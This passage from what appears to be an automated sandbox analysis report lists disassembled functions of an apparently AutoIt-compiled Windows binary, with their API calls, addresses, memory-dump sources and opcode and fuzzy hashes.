                                                    • RtlDecodePointer.NTDLL(0047BB70,0000001C,003E33C2,00000000,00000001,00000000,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34B6
                                                    • DecodePointer.KERNEL32(?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34C7
                                                    • EncodePointer.KERNEL32(00000000,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34E0
                                                    • DecodePointer.KERNEL32(-00000004,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34F0
                                                    • EncodePointer.KERNEL32(00000000,?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E34F6
                                                    • DecodePointer.KERNEL32(?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E350C
                                                    • DecodePointer.KERNEL32(?,003E3310,000000FF,?,003E9E6E,00000011,?,?,003E9CBC,0000000D), ref: 003E3517
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Pointer$Decode$Encode$CriticalEnterSection
                                                    • String ID:
                                                    • API String ID: 3368343417-0
                                                    • Opcode ID: 876c693ef5ee5a519ec3c8234a55604b02e15f09d7b7eee2ccad0847980a3c81
                                                    • Instruction ID: 810d4a27ad54f49483138d5a506d06fccb30e37d043af80b90fcad8666217537
                                                    • Opcode Fuzzy Hash: 876c693ef5ee5a519ec3c8234a55604b02e15f09d7b7eee2ccad0847980a3c81
                                                    • Instruction Fuzzy Hash: 3F318D709043A99EEF12AF66EC0D79D7BB0FB45311F21467AE404AA2D0DBB51A44CF18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C39E7, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32 ref: 003C3A15
                                                    • CreateWindowExW.USER32 ref: 003C3A36
                                                    • ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A4A
                                                    • ShowWindow.USER32(00000001,?,?,?,003C49C2,?), ref: 003C3A53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: df95a080021a3c39a1fcadb3d89dfac9f5f20fde3532288946dde1840e79a72f
                                                    • Instruction ID: 24f8fe77482e8b3688a4295e0746637efa6c729492ad72a351d464be80a4f454
                                                    • Opcode Fuzzy Hash: df95a080021a3c39a1fcadb3d89dfac9f5f20fde3532288946dde1840e79a72f
                                                    • Instruction Fuzzy Hash: 74F03A716402907EEA702727AC08F3B3E3DD7C7F51B0245BEB900A6170C6A90844CBB8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F809E, Relevance: 9.7, APIs: 6, Instructions: 653COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F8355
                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F836F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F8392
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F83A4
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F876A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109,?,00000000), ref: 003F8796
                                                      • Part of subcall function 003F0D2D: FindCloseChangeNotification.KERNELBASE(00000000,?,00000109,?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003F0D7D
                                                      • Part of subcall function 003F0D2D: GetLastError.KERNEL32(?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78), ref: 003F0D87
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLast$Close$Handle$ChangeFileFindNotificationType
                                                    • String ID:
                                                    • API String ID: 688622981-0
                                                    • Opcode ID: 027f2f791d836870666ce052b0980fc48960d7d1a272b883af55e201262129c2
                                                    • Instruction ID: ce7b65ff6851161180d4cd0b418e1a86c78f2762258e408cf5169e79fae30801
                                                    • Opcode Fuzzy Hash: 027f2f791d836870666ce052b0980fc48960d7d1a272b883af55e201262129c2
                                                    • Instruction Fuzzy Hash: EE222472D0410EAFEB2B9F68DC42BBE7B64EB01324F254629E711AA2E1DF358D51C750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003EB1AD, Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 827COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BE
                                                    • API String ID: 0-66389866
                                                    • Opcode ID: 60846b20b48fadabed6b0e5f90e4a2535ab5ba3a829d8a1aa2457197ad50c7c8
                                                    • Instruction ID: c6b582d3e95b41e7bb527732a02becef7dd112ac95639b00793053b0db0d3939
                                                    • Opcode Fuzzy Hash: 60846b20b48fadabed6b0e5f90e4a2535ab5ba3a829d8a1aa2457197ad50c7c8
                                                    • Instruction Fuzzy Hash: 70627FF19002B98EDB278F16CC857AAF7B8EB44314F1542EAD648A72D1E7305EC58F58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F7F4D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryfileloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109,?,00000000,0047BC78,0000000C,003E549B,?,?,00000040), ref: 003F7F66
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003F7F6D
                                                    • CreateFileW.KERNELBASE(?,?,?,00000080,?,?,00000000,00000001,?,?,?,00000000,00000109,?,00000000,0047BC78), ref: 003F7FCB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressCreateFileHandleModuleProc
                                                    • String ID: CreateFile2$kernel32.dll
                                                    • API String ID: 2580138172-1988006178
                                                    • Opcode ID: f36d102d5a819f0589a3ff55a512c8e15338f83f3c0772fecf716293570b759f
                                                    • Instruction ID: ccd82226683910e67a2909232f860e8c5df4d42acc74ae4f53959292bb20fd41
                                                    • Opcode Fuzzy Hash: f36d102d5a819f0589a3ff55a512c8e15338f83f3c0772fecf716293570b759f
                                                    • Instruction Fuzzy Hash: A011097290020EEFDF029FA4DC05AFE7BB9FF08351F104115FA14961A0C7369A249BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E2EC8, Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlDecodePointer.NTDLL(00000004,00000001,00000000,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?), ref: 003E2EDB
                                                    • DecodePointer.KERNEL32(?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001,?), ref: 003E2EE6
                                                    • EncodePointer.KERNEL32(00000000,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001), ref: 003E2F4D
                                                    • EncodePointer.KERNEL32(?,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001), ref: 003E2F5B
                                                    • EncodePointer.KERNEL32(00000004,?,?,003E2EA5,?,0047BB50,0000000C,003E2F8B,?,?,003C8AED,003FB80A,0044FB84,?,00000000,00000001), ref: 003E2F67
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Pointer$Encode$Decode
                                                    • String ID:
                                                    • API String ID: 1898114064-0
                                                    • Opcode ID: d7a515d59dfa60af1f1e42d677997054f53a35834c983bc40a37dec96c6e3447
                                                    • Instruction ID: 3d99a22b8d26405bcd0c8f80c22833638bb01c58e46e928618ba61fb1c917d2d
                                                    • Opcode Fuzzy Hash: d7a515d59dfa60af1f1e42d677997054f53a35834c983bc40a37dec96c6e3447
                                                    • Instruction Fuzzy Hash: 8811D672A24264AFDB11EF75ED84CABBBBDFB01390710467AF805D2590EB31EC018B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C35B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,00000000,80000001,80000001,?,003C35A1,SwapMouseButtons,00000004,?,MAIN,MAIN), ref: 003C35D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00000000,80000001,80000001,?,003C35A1,SwapMouseButtons,00000004,?), ref: 003C35F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,00000000,80000001,80000001,?,003C35A1,SwapMouseButtons,00000004,?,MAIN,MAIN,?,00424EB8,?,0043502E), ref: 003C3617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: d2430cbec2965e75f398163093708ff249c8f48badeb4a9db651f4bc30618dac
                                                    • Instruction ID: 677ee52983e14bb96c9a099ac7e5aaf98d94304c6d95c4fef85b765339f0a1dc
                                                    • Opcode Fuzzy Hash: d2430cbec2965e75f398163093708ff249c8f48badeb4a9db651f4bc30618dac
                                                    • Instruction Fuzzy Hash: 5D114875610108BEDB218FA4EC84EFEBBBCEF41344F028569F405D7210D232AF549760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C410D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C41F1
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003FD5EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String
                                                    • String ID: Line:
                                                    • API String ID: 3363329723-1585850449
                                                    • Opcode ID: 7aed34e559dd275ddf3968765b8d6fe823f09ea3694fab7120a610cf0aae47f6
                                                    • Instruction ID: 1e3c47b31aa8f6d93fb4f8e39a88dff22b9346a04fedeba98b7ec43db8fb8eee
                                                    • Opcode Fuzzy Hash: 7aed34e559dd275ddf3968765b8d6fe823f09ea3694fab7120a610cf0aae47f6
                                                    • Instruction Fuzzy Hash: 9931A1710083546AD363FB60DC46FDF77ECAB44310F10496EF589DA0A1EB74AA48CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043CDF1, Relevance: 4.9, APIs: 3, Instructions: 413COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ae39d2386e0de0a1e5698799651f81b3ddb6c15722ff586e814a655359955aa
                                                    • Instruction ID: e2fcb2df9a7d436a1fe45cc1dae348020afeeda648fdcf2f3641915cd6f51b19
                                                    • Opcode Fuzzy Hash: 9ae39d2386e0de0a1e5698799651f81b3ddb6c15722ff586e814a655359955aa
                                                    • Instruction Fuzzy Hash: BAF19A719083009FC714DF29D884A6BBBE4FF88328F14892EF8999B251D735E945CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4531, Relevance: 4.6, APIs: 3, Instructions: 70timewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C41F1
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 003C45B5
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C45C4
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003FD6CE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer$Kill
                                                    • String ID:
                                                    • API String ID: 3500052701-0
                                                    • Opcode ID: 84025cb5293b99825415f90277f67570891bdd2e2d74c1b985c19a687fb77d1a
                                                    • Instruction ID: bedde48ae76bf8328cc45f0fdd99201188c4a5764b7fae231c4bcccca1c0c872
                                                    • Opcode Fuzzy Hash: 84025cb5293b99825415f90277f67570891bdd2e2d74c1b985c19a687fb77d1a
                                                    • Instruction Fuzzy Hash: 4721B071504388AFE7338B209C59FF7BBED9F02319F04009EE29E96181C7755A889B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D0A8D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C26,004862F8,?,?,?,?,003C49C2,?), ref: 003D0ACE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FullNamePath
                                                    • String ID: cH
                                                    • API String ID: 608056474-3538314586
                                                    • Opcode ID: 2478d51a65e2de582a2bd03719df154ac8a635dbc1d1cb257f72651c3816fb2c
                                                    • Instruction ID: 65fd9fa0235e67b258b17436f193ebbe4a15ba59bb87be5dbf1b226e4c7311b9
                                                    • Opcode Fuzzy Hash: 2478d51a65e2de582a2bd03719df154ac8a635dbc1d1cb257f72651c3816fb2c
                                                    • Instruction Fuzzy Hash: 0411C6329042089ACB42EBB4ED05EED77BCEF04350F0004A7B948DB240DA74EB844B14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E7E93, Relevance: 3.1, APIs: 2, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003EA048: GetStartupInfoW.KERNEL32(?), ref: 003EA052
                                                    • __RTC_Initialize.LIBCMT ref: 003E7F19
                                                    • GetCommandLineW.KERNEL32(0047BD38,00000014), ref: 003E7F33
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CommandInfoInitializeLineStartup
                                                    • String ID:
                                                    • API String ID: 3075285763-0
                                                    • Opcode ID: c56f735511e393f9a35ad9ee2bfc79b770de1757d0d5a729ff0a355309160875
                                                    • Instruction ID: cef34c4013bc9d01165a7cedfd1b3b2d322ec0f65a7d4e6c680fcff28b81e3b7
                                                    • Opcode Fuzzy Hash: c56f735511e393f9a35ad9ee2bfc79b770de1757d0d5a729ff0a355309160875
                                                    • Instruction Fuzzy Hash: 8721C460A083F599DB27BBB6984BF7D2264AF40715F110B6AF604EE1C2DFB4894247A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C43DB, Relevance: 3.1, APIs: 2, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 003C44A6
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003C44C3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: 203829223cd225e453a9611bbdc4a1e59cfc77ea03f45a4ed381c3f12eb1f4c2
                                                    • Instruction ID: 403306f26cd2b725ca04305cd51f8147f1aadd6b0b1a5c8be41981443c47b04b
                                                    • Opcode Fuzzy Hash: 203829223cd225e453a9611bbdc4a1e59cfc77ea03f45a4ed381c3f12eb1f4c2
                                                    • Instruction Fuzzy Hash: AE31AEB15043019FD725EF35E884BABBBE8EB09309F10097EF19AC6240D775A948CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F0D2D, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000109,?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003F0D7D
                                                    • GetLastError.KERNEL32(?,003F8469,?,?,?,?,?,?,?,?,?,00000000,00000109,?,00000000,0047BC78), ref: 003F0D87
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                    • String ID:
                                                    • API String ID: 1687624791-0
                                                    • Opcode ID: 0dca3f5aca152cc874af70b72fbf55381a53c14a70a949c1accd1404b6a4ff72
                                                    • Instruction ID: 65f8590fcaf31f993927e7df3c0097204a93c6db19d067909c2928770d537e08
                                                    • Opcode Fuzzy Hash: 0dca3f5aca152cc874af70b72fbf55381a53c14a70a949c1accd1404b6a4ff72
                                                    • Instruction Fuzzy Hash: 020161376010B815C62B1BFDBD49B7E2B4D9B82774F160319FA588A0D3DAA0A4404191
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5DF9, Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,003C5981,?,?,?,?), ref: 003C5E27
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,003C5981,?,?,?,?), ref: 003FE19C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c0b2b8da0c9a055c338450c6500f28a19625206e84b2f2e390b6d7a003dbc4e1
                                                    • Instruction ID: 25b38fc3c09868468b6525584db35ce6ac24c684198c43602243fea1c8431e59
                                                    • Opcode Fuzzy Hash: c0b2b8da0c9a055c338450c6500f28a19625206e84b2f2e390b6d7a003dbc4e1
                                                    • Instruction Fuzzy Hash: 62115671244708BEF3250E25DC8AFB33B9CEB117A8F118319FAE5991E0C6756D85CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C492E, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 003C4992
                                                      • Part of subcall function 003E35AC: DecodePointer.KERNEL32(00000001,?,003C49A7,004181BC), ref: 003E35BE
                                                      • Part of subcall function 003E35AC: EncodePointer.KERNEL32(?,?,003C49A7,004181BC), ref: 003E35C9
                                                      • Part of subcall function 003C4A5B: SystemParametersInfoW.USER32 ref: 003C4A73
                                                      • Part of subcall function 003C4A5B: SystemParametersInfoW.USER32 ref: 003C4A88
                                                      • Part of subcall function 003C3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,003C49C2,?), ref: 003C3B7A
                                                      • Part of subcall function 003C3B4C: IsDebuggerPresent.KERNEL32(?,?,?,003C49C2,?), ref: 003C3B8C
                                                      • Part of subcall function 003C3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004862F8,004862E0,?,?,?,003C49C2,?), ref: 003C3BFD
                                                      • Part of subcall function 003C3B4C: SetCurrentDirectoryW.KERNEL32(?,?,003C49C2,?), ref: 003C3C81
                                                    • SystemParametersInfoW.USER32 ref: 003C49D2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
                                                    • String ID:
                                                    • API String ID: 1658450864-0
                                                    • Opcode ID: 2d11a078aef94884c79ecbb2dc142eebc7542552456ae253a79a2ed5a8dd06cd
                                                    • Instruction ID: f17506bc156e0519a320b8c0d8d1676b36bf0ef2014b0391ccf3621b9ec634d5
                                                    • Opcode Fuzzy Hash: 2d11a078aef94884c79ecbb2dc142eebc7542552456ae253a79a2ed5a8dd06cd
                                                    • Instruction Fuzzy Hash: 8B11AC719183119BC301EF29DC49A0EFBF8EB84710F01496EF0448B2A1DB709954CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F5173, Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,003E7F43), ref: 003F5178
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003E7F43), ref: 003F51C1
